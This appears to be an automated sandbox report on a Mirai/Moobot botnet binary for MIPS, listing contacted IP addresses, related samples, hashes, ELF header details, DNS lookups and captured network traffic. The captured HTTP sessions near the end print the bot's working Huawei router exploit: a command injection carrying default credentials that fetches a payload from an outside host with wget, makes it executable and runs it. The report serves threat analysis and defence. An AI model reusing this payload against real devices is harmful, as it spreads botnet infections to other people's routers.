                  IPDomainCountryFlagASNASN NameMalicious
                  68.143.59.176
                  unknownUnited States
                  7029WINDSTREAMUSfalse
                  157.168.217.37
                  unknownSwitzerland
                  22192SSHENETUSfalse
                  197.171.4.201
                  unknownSouth Africa
                  37168CELL-CZAfalse
                  41.215.47.54
                  unknownKenya
                  15808ACCESSKENYA-KEACCESSKENYAGROUPLTDisanISPservingKEfalse
                  83.177.243.42
                  unknownSweden
                  39651COMHEM-SWEDENSEfalse
                  41.99.21.167
                  unknownAlgeria
                  36947ALGTEL-ASDZfalse
                  41.53.150.179
                  unknownSouth Africa
                  37168CELL-CZAfalse
                  41.226.118.95
                  unknownTunisia
                  37705TOPNETTNfalse
                  41.246.219.25
                  unknownSouth Africa
                  5713SAIX-NETZAfalse
                  146.213.125.18
                  unknownNorway
                  5619EVRY-NOfalse
                  41.23.98.74
                  unknownSouth Africa
                  29975VODACOM-ZAfalse
                  197.4.17.53
                  unknownTunisia
                  5438ATI-TNfalse
                  157.17.26.14
                  unknownJapan2907SINET-ASResearchOrganizationofInformationandSystemsNfalse
                  42.9.82.117
                  unknownKorea Republic of
                  4249LILLY-ASUSfalse
                  41.99.21.176
                  unknownAlgeria
                  36947ALGTEL-ASDZfalse
                  157.255.153.133
                  unknownChina
                  134543UNICOM-DONGGUAN-IDCChinaUnicomGuangdongIPnetworkCNfalse
                  41.233.156.29
                  unknownEgypt
                  8452TE-ASTE-ASEGfalse
                  41.22.177.120
                  unknownSouth Africa
                  29975VODACOM-ZAfalse
                  197.28.73.126
                  unknownTunisia
                  37492ORANGE-TNfalse
                  162.94.20.140
                  unknownUnited States
                  22089HALLMARKUSfalse
                  157.30.254.165
                  unknownUnited States
                  8968BT-ITALIAITfalse
                  41.39.82.134
                  unknownEgypt
                  8452TE-ASTE-ASEGfalse
                  157.149.155.187
                  unknownUnited States
                  3464ASC-NETUSfalse
                  2.17.183.129
                  unknownEuropean Union
                  16625AKAMAI-ASUSfalse
                  197.131.140.177
                  unknownMorocco
                  6713IAM-ASMAfalse
                  157.78.108.51
                  unknownJapan4725ODNSoftBankMobileCorpJPfalse
                  197.59.106.149
                  unknownEgypt
                  8452TE-ASTE-ASEGfalse
                  117.194.113.133
                  unknownIndia
                  9829BSNL-NIBNationalInternetBackboneINfalse
                  197.240.73.5
                  unknownunknown
                  37705TOPNETTNfalse
                  78.189.181.93
                  unknownTurkey
                  9121TTNETTRfalse
                  43.113.207.132
                  unknownJapan4249LILLY-ASUSfalse
                  157.102.254.152
                  unknownJapan2907SINET-ASResearchOrganizationofInformationandSystemsNfalse
                  77.171.30.190
                  unknownNetherlands
                  1136KPNKPNNationalEUfalse
                  197.74.23.185
                  unknownSouth Africa
                  16637MTNNS-ASZAfalse
                  41.123.26.181
                  unknownSouth Africa
                  16637MTNNS-ASZAfalse
                  53.160.134.180
                  unknownGermany
                  31399DAIMLER-ASITIGNGlobalNetworkDEfalse
                  157.163.221.226
                  unknownGermany
                  22192SSHENETUSfalse
                  1.135.174.170
                  unknownAustralia
                  1221ASN-TELSTRATelstraCorporationLtdAUfalse
                  121.30.16.70
                  unknownChina
                  4837CHINA169-BACKBONECHINAUNICOMChina169BackboneCNfalse
                  157.203.50.86
                  unknownUnited Kingdom
                  21369SEMA-UK-ASGBfalse
                  157.101.27.10
                  unknownJapan27947TelconetSAECfalse
                  41.37.5.155
                  unknownEgypt
                  8452TE-ASTE-ASEGfalse
                  157.126.150.108
                  unknownUnited States
                  1738OKOBANK-ASEUfalse
                  41.60.13.93
                  unknownMauritius
                  30844LIQUID-ASGBfalse
                  85.45.125.178
                  unknownItaly
                  3269ASN-IBSNAZITfalse
                  100.163.183.147
                  unknownUnited States
                  21928T-MOBILE-AS21928USfalse
                  197.54.109.101
                  unknownEgypt
                  8452TE-ASTE-ASEGfalse
                  75.27.117.49
                  unknownUnited States
                  7018ATT-INTERNET4USfalse
                  41.74.187.219
                  unknownSouth Africa
                  37053RSAWEB-ASZAfalse
                  157.105.38.153
                  unknownJapan2907SINET-ASResearchOrganizationofInformationandSystemsNfalse
                  211.57.132.56
                  unknownKorea Republic of
                  4766KIXS-AS-KRKoreaTelecomKRfalse
                  157.28.246.0
                  unknownItaly
                  8968BT-ITALIAITfalse
                  157.112.196.104
                  unknownJapan55394GREE-NETGREEIncJPfalse
                  9.131.242.6
                  unknownUnited States
                  3356LEVEL3USfalse
                  197.179.206.160
                  unknownKenya
                  33771SAFARICOM-LIMITEDKEfalse
                  41.57.219.94
                  unknownGhana
                  37103BUSYINTERNETGHfalse
                  197.220.254.106
                  unknownZambia
                  37214MICROLINKZMfalse
                  41.232.124.4
                  unknownEgypt
                  8452TE-ASTE-ASEGfalse
                  41.158.229.97
                  unknownGabon
                  16058Gabon-TelecomGAfalse
                  25.205.210.81
                  unknownUnited Kingdom
                  7922COMCAST-7922USfalse
                  105.54.134.215
                  unknownKenya
                  33771SAFARICOM-LIMITEDKEfalse
                  174.233.131.244
                  unknownUnited States
                  22394CELLCOUSfalse
                  159.140.225.105
                  unknownUnited States
                  17264CERNER-COMUSfalse
                  157.22.104.144
                  unknownUnited States
                  397379NLN-ASN-01USfalse
                  197.74.209.105
                  unknownSouth Africa
                  16637MTNNS-ASZAfalse
                  171.12.104.124
                  unknownChina
                  4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
                  157.139.187.7
                  unknownUnited States
                  20252JSIWMCUSfalse
                  157.9.137.42
                  unknownJapan4837CHINA169-BACKBONECHINAUNICOMChina169BackboneCNfalse
                  197.153.73.28
                  unknownMorocco
                  36925ASMediMAfalse
                  180.56.177.159
                  unknownJapan4713OCNNTTCommunicationsCorporationJPfalse
                  157.205.3.144
                  unknownJapan17514AICSOtsukaCorpJPfalse
                  34.194.207.55
                  unknownUnited States
                  14618AMAZON-AESUSfalse
                  41.97.193.122
                  unknownAlgeria
                  36947ALGTEL-ASDZfalse
                  99.157.202.155
                  unknownUnited States
                  7018ATT-INTERNET4USfalse
                  41.186.109.18
                  unknownRwanda
                  36890MTNRW-ASNRWfalse
                  41.60.37.40
                  unknownMauritius
                  30969ZOL-ASGBfalse
                  197.40.144.150
                  unknownEgypt
                  8452TE-ASTE-ASEGfalse
                  107.171.190.137
                  unknownCanada
                  5769VIDEOTRONCAfalse
                  157.35.36.109
                  unknownIndia
                  55836RELIANCEJIO-INRelianceJioInfocommLimitedINfalse
                  41.84.77.27
                  unknownSouth Africa
                  37179AFRICAINXZAfalse
                  157.172.185.146
                  unknownFrance
                  22192SSHENETUSfalse
                  157.21.250.55
                  unknownUnited States
                  53446EVMSUSfalse
                  197.73.219.67
                  unknownSouth Africa
                  16637MTNNS-ASZAfalse
                  197.155.123.255
                  unknownSouth Africa
                  37356O-TelZAfalse
                  157.40.148.207
                  unknownIndia
                  55836RELIANCEJIO-INRelianceJioInfocommLimitedINfalse
                  41.74.140.220
                  unknownCape Verde
                  37517CV-MultimediaCVfalse
                  119.197.149.90
                  unknownKorea Republic of
                  4766KIXS-AS-KRKoreaTelecomKRfalse
                  99.96.115.58
                  unknownUnited States
                  7018ATT-INTERNET4USfalse
                  41.133.169.246
                  unknownSouth Africa
                  10474OPTINETZAfalse
                  35.248.242.29
                  unknownUnited States
                  3549LVLT-3549USfalse
                  4.11.179.96
                  unknownUnited States
                  3356LEVEL3USfalse
                  197.165.56.177
                  unknownEgypt
                  24863LINKdotNET-ASEGfalse
                  197.152.229.150
                  unknownTanzania United Republic of
                  37133airtel-tz-asTZfalse
                  41.20.67.190
                  unknownSouth Africa
                  36994Vodacom-VBZAfalse
                  41.21.252.21
                  unknownSouth Africa
                  36994Vodacom-VBZAfalse
                  106.34.12.229
                  unknownChina
                  4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
                  41.207.181.174
                  unknownTogo
                  24691TOGOTEL-ASTogoTelecomTogoTGfalse
                  157.148.104.86
                  unknownChina
                  136958UNICOM-GUANGZHOU-IDCChinaUnicomGuangdongIPnetworkCNfalse
                  41.138.153.56
                  unknownMauritania
                  37541CHINGUITELMRfalse
                  54.254.53.136
                  unknownUnited States
                  16509AMAZON-02USfalse
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  146.213.125.18mirai.arm.elfGet hashmaliciousMiraiBrowse
                    157.168.217.3715PRjvBuol.elfGet hashmaliciousMirai, MoobotBrowse
                      41.23.98.74x86.elfGet hashmaliciousUnknownBrowse
                        197.171.4.201F3DI6eOMlI.elfGet hashmaliciousMirai, MoobotBrowse
                          197.4.17.53dhBypQudq0.elfGet hashmaliciousMirai, MoobotBrowse
                            157.17.26.14oT8s0gS7rz.elfGet hashmaliciousMirai, MoobotBrowse
                              41.99.21.167W1zYK73DpA.elfGet hashmaliciousMirai, MoobotBrowse
                                41.99.21.176arm.elfGet hashmaliciousMirai, MoobotBrowse
                                  asMAadSRFd.elfGet hashmaliciousMiraiBrowse
                                    ZoQ7612pNw.elfGet hashmaliciousMiraiBrowse
                                      bk.mpsl-20221002-1437.elfGet hashmaliciousMiraiBrowse
                                        41.53.150.179g5FxNXoqH7.elfGet hashmaliciousMiraiBrowse
                                          41.226.118.95fMImVeZ2Zf.elfGet hashmaliciousMirai, MoobotBrowse
                                            rctVL9toM1.elfGet hashmaliciousUnknownBrowse
                                              sora.x86Get hashmaliciousMiraiBrowse
                                                BXsIdfBOkgGet hashmaliciousMiraiBrowse
                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  ok.ditmemost.click57d8RwavoZ.elfGet hashmaliciousMirai, MoobotBrowse
                                                  • 94.156.66.70
                                                  j5pd3mg5a4.elfGet hashmaliciousMirai, MoobotBrowse
                                                  • 94.156.66.70
                                                  bot.mips.elfGet hashmaliciousMirai, MoobotBrowse
                                                  • 103.237.87.24
                                                  bot.x86.elfGet hashmaliciousMirai, MoobotBrowse
                                                  • 103.237.87.24
                                                  yzKJORP7Q4.elfGet hashmaliciousMirai, MoobotBrowse
                                                  • 103.237.87.24
                                                  AsrP4dFOgM.elfGet hashmaliciousMirai, MoobotBrowse
                                                  • 103.237.87.24
                                                  4rg5Y5MHO8.elfGet hashmaliciousMirai, MoobotBrowse
                                                  • 103.237.87.24
                                                  gJlGkncVHO.elfGet hashmaliciousMirai, MoobotBrowse
                                                  • 103.237.87.24
                                                  j55aXfhPv3.elfGet hashmaliciousMirai, MoobotBrowse
                                                  • 103.237.87.24
                                                  dLW2bzO9c1.elfGet hashmaliciousMirai, MoobotBrowse
                                                  • 103.237.87.24
                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  WINDSTREAMUS57d8RwavoZ.elfGet hashmaliciousMirai, MoobotBrowse
                                                  • 146.145.172.248
                                                  Dj9Lgl2zLd.elfGet hashmaliciousMiraiBrowse
                                                  • 75.89.15.223
                                                  x64.nn.elfGet hashmaliciousMiraiBrowse
                                                  • 71.31.88.8
                                                  x86.nn.elfGet hashmaliciousMiraiBrowse
                                                  • 66.7.38.159
                                                  skt.mips.elfGet hashmaliciousMiraiBrowse
                                                  • 66.147.120.255
                                                  skt.m68k.elfGet hashmaliciousMiraiBrowse
                                                  • 209.152.199.14
                                                  skt.x86.elfGet hashmaliciousMiraiBrowse
                                                  • 71.29.226.181
                                                  skt.sh4.elfGet hashmaliciousMiraiBrowse
                                                  • 207.155.42.187
                                                  skt.spc.elfGet hashmaliciousMiraiBrowse
                                                  • 98.141.42.1
                                                  bPnq1YMDrf.elfGet hashmaliciousMirai, OkiruBrowse
                                                  • 66.35.149.58
                                                  ACCESSKENYA-KEACCESSKENYAGROUPLTDisanISPservingKEarm.nn.elfGet hashmaliciousMiraiBrowse
                                                  • 41.215.4.42
                                                  skt.spc.elfGet hashmaliciousMiraiBrowse
                                                  • 41.215.35.98
                                                  L6i3RnSvpp.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                  • 41.215.35.67
                                                  wO2hW34tnC.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                  • 41.215.60.24
                                                  0xh0roxxnavebusyoo.arm7.elfGet hashmaliciousMiraiBrowse
                                                  • 41.215.59.26
                                                  dLW2bzO9c1.elfGet hashmaliciousMirai, MoobotBrowse
                                                  • 41.215.35.28
                                                  GvNh44c0Un.elfGet hashmaliciousMiraiBrowse
                                                  • 41.215.35.82
                                                  msPLtZiPcA.elfGet hashmaliciousMiraiBrowse
                                                  • 197.254.120.17
                                                  byKLI4nzv2.elfGet hashmaliciousMiraiBrowse
                                                  • 41.215.35.81
                                                  gL3eLP81mu.elfGet hashmaliciousMirai, OkiruBrowse
                                                  • 41.215.4.13
                                                  SSHENETUS57d8RwavoZ.elfGet hashmaliciousMirai, MoobotBrowse
                                                  • 157.170.24.73
                                                  j5pd3mg5a4.elfGet hashmaliciousMirai, MoobotBrowse
                                                  • 157.170.36.57
                                                  6OS2bzcvt9.elfGet hashmaliciousMiraiBrowse
                                                  • 157.62.205.16
                                                  bot.arm5-20240528-2109.elfGet hashmaliciousMirai, MoobotBrowse
                                                  • 157.176.208.193
                                                  bot.mips-20240528-2110.elfGet hashmaliciousMirai, MoobotBrowse
                                                  • 157.180.38.236
                                                  arm.nn.elfGet hashmaliciousMiraiBrowse
                                                  • 157.176.29.117
                                                  skt.arm4.elfGet hashmaliciousMiraiBrowse
                                                  • 157.170.36.39
                                                  skt.arm7.elfGet hashmaliciousMiraiBrowse
                                                  • 157.171.75.234
                                                  skt.arm6.elfGet hashmaliciousMiraiBrowse
                                                  • 157.176.29.126
                                                  L6i3RnSvpp.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                  • 157.168.229.42
                                                  CELL-CZA57d8RwavoZ.elfGet hashmaliciousMirai, MoobotBrowse
                                                  • 197.106.7.114
                                                  bot.mpsl-20240528-2108.elfGet hashmaliciousMirai, MoobotBrowse
                                                  • 197.105.22.217
                                                  bot.arm5-20240528-2109.elfGet hashmaliciousMirai, MoobotBrowse
                                                  • 41.51.170.65
                                                  bot.mips-20240528-2110.elfGet hashmaliciousMirai, MoobotBrowse
                                                  • 197.108.245.171
                                                  arm7.nn.elfGet hashmaliciousMiraiBrowse
                                                  • 41.157.29.99
                                                  arm.nn.elfGet hashmaliciousMiraiBrowse
                                                  • 41.54.60.149
                                                  mpl.nn.elfGet hashmaliciousMiraiBrowse
                                                  • 197.109.109.82
                                                  x86.nn.elfGet hashmaliciousMiraiBrowse
                                                  • 197.108.90.208
                                                  EZPrs0LSHV.elfGet hashmaliciousMiraiBrowse
                                                  • 197.168.76.239
                                                  skt.arm4.elfGet hashmaliciousMiraiBrowse
                                                  • 197.105.252.137
                                                  No context
                                                  No context
                                                  No created / dropped files found
                                                  File type:ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
                                                  Entropy (8bit):5.057353209919315
                                                  TrID:
                                                  • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                                  File name:bot.mips.elf
                                                  File size:181'676 bytes
                                                  MD5:c0e2c62a6224d9aa9e770ab1a2bda75b
                                                  SHA1:d166722d0757d17ef041adad3f899e92f25fca54
                                                  SHA256:f44f4227f6dcba81fe0b5e6b1b7b966d7747e2c01f4b637462c7ccba520f4a93
                                                  SHA512:de5f5f2431c01370a89b096ea2397cb2ccc35c271d58ee9e215267bf098a668611570d4b02ad487fbf3e88195beef718727e6d68a375bed2f07b215ba872bd87
                                                  SSDEEP:3072:ffOMNeyj+bwHslybNcqLMH1bKHe1Dx1HE:fNeyqJavMJK+1Dx1HE
                                                  TLSH:4604A81E6E228F7EF668873547B78D25976C23D627E1D644E1ACC2101E6038E641FFE8
                                                  File Content Preview:.ELF.....................@.`...4...|.....4. ...(.............@...@....l`..l`..............p..Fp..Fp...S.............dt.Q............................<...'.8....!'.......................<...'.8....!...$....'9... ......................<...'.8....!... ....'9B

                                                  ELF header

                                                  Class:ELF32
                                                  Data:2's complement, big endian
                                                  Version:1 (current)
                                                  Machine:MIPS R3000
                                                  Version Number:0x1
                                                  Type:EXEC (Executable file)
                                                  OS/ABI:UNIX - System V
                                                  ABI Version:0
                                                  Entry Point Address:0x400260
                                                  Flags:0x1007
                                                  ELF Header Size:52
                                                  Program Header Offset:52
                                                  Program Header Size:32
                                                  Number of Program Headers:3
                                                  Section Header Offset:181116
                                                  Section Header Size:40
                                                  Number of Section Headers:14
                                                  Header String Table Index:13
                                                  NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                                  NULL0x00x00x00x00x0000
                                                  .initPROGBITS0x4000940x940x8c0x00x6AX004
                                                  .textPROGBITS0x4001200x1200x241d00x00x6AX0016
                                                  .finiPROGBITS0x4242f00x242f00x5c0x00x6AX004
                                                  .rodataPROGBITS0x4243500x243500x29100x00x2A0016
                                                  .ctorsPROGBITS0x4670000x270000xc0x00x3WA004
                                                  .dtorsPROGBITS0x46700c0x2700c0x80x00x3WA004
                                                  .data.rel.roPROGBITS0x4670180x270180xa40x00x3WA004
                                                  .dataPROGBITS0x4670c00x270c00x48d80x00x3WA0032
                                                  .gotPROGBITS0x46b9a00x2b9a00x9780x40x10000003WAp0016
                                                  .sbssNOBITS0x46c3180x2c3180x4c0x00x10000003WAp004
                                                  .bssNOBITS0x46c3700x2c3180x47480x00x3WA0016
                                                  .mdebug.abi32PROGBITS0x12480x2c3180x00x00x0001
                                                  .shstrtabSTRTAB0x00x2c3180x640x00x0001
                                                  TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                  LOAD0x00x4000000x4000000x26c600x26c605.44490x5R E0x10000.init .text .fini .rodata
                                                  LOAD0x270000x4670000x4670000x53180x9ab81.08790x6RW 0x10000.ctors .dtors .data.rel.ro .data .got .sbss .bss
                                                  GNU_STACK0x00x00x00x00x00.00000x7RWE0x4
                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                  May 29, 2024 15:15:10.590465069 CEST192.168.2.138.8.8.80xf7b9Standard query (0)ok.ditmemost.clickA (IP address)IN (0x0001)false
                                                  May 29, 2024 15:15:33.983335018 CEST192.168.2.138.8.8.80x5ea0Standard query (0)ok.ditmemost.clickA (IP address)IN (0x0001)false
                                                  May 29, 2024 15:16:04.393157005 CEST192.168.2.138.8.8.80xc5c5Standard query (0)ok.ditmemost.clickA (IP address)IN (0x0001)false
                                                  May 29, 2024 15:16:06.416829109 CEST192.168.2.138.8.8.80xe005Standard query (0)ok.ditmemost.clickA (IP address)IN (0x0001)false
                                                  May 29, 2024 15:16:35.152005911 CEST192.168.2.138.8.8.80xaf42Standard query (0)ok.ditmemost.clickA (IP address)IN (0x0001)false
                                                  May 29, 2024 15:17:06.545202017 CEST192.168.2.138.8.8.80x7bf1Standard query (0)ok.ditmemost.clickA (IP address)IN (0x0001)false
                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                  May 29, 2024 15:15:10.597573042 CEST8.8.8.8192.168.2.130xf7b9No error (0)ok.ditmemost.click94.156.66.70A (IP address)IN (0x0001)false
                                                  May 29, 2024 15:15:33.990562916 CEST8.8.8.8192.168.2.130x5ea0No error (0)ok.ditmemost.click94.156.66.70A (IP address)IN (0x0001)false
                                                  May 29, 2024 15:16:04.400111914 CEST8.8.8.8192.168.2.130xc5c5No error (0)ok.ditmemost.click94.156.66.70A (IP address)IN (0x0001)false
                                                  May 29, 2024 15:16:06.748717070 CEST8.8.8.8192.168.2.130xe005No error (0)ok.ditmemost.click94.156.66.70A (IP address)IN (0x0001)false
                                                  May 29, 2024 15:16:35.159862041 CEST8.8.8.8192.168.2.130xaf42No error (0)ok.ditmemost.click94.156.66.70A (IP address)IN (0x0001)false
                                                  May 29, 2024 15:17:06.552402973 CEST8.8.8.8192.168.2.130x7bf1No error (0)ok.ditmemost.click94.156.66.70A (IP address)IN (0x0001)false
                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  0192.168.2.134436841.25.99.19037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.651643038 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1192.168.2.133416241.24.33.19237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.651648998 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2192.168.2.133789041.253.54.21437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.651669025 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3192.168.2.1339692157.180.28.18337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.651670933 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
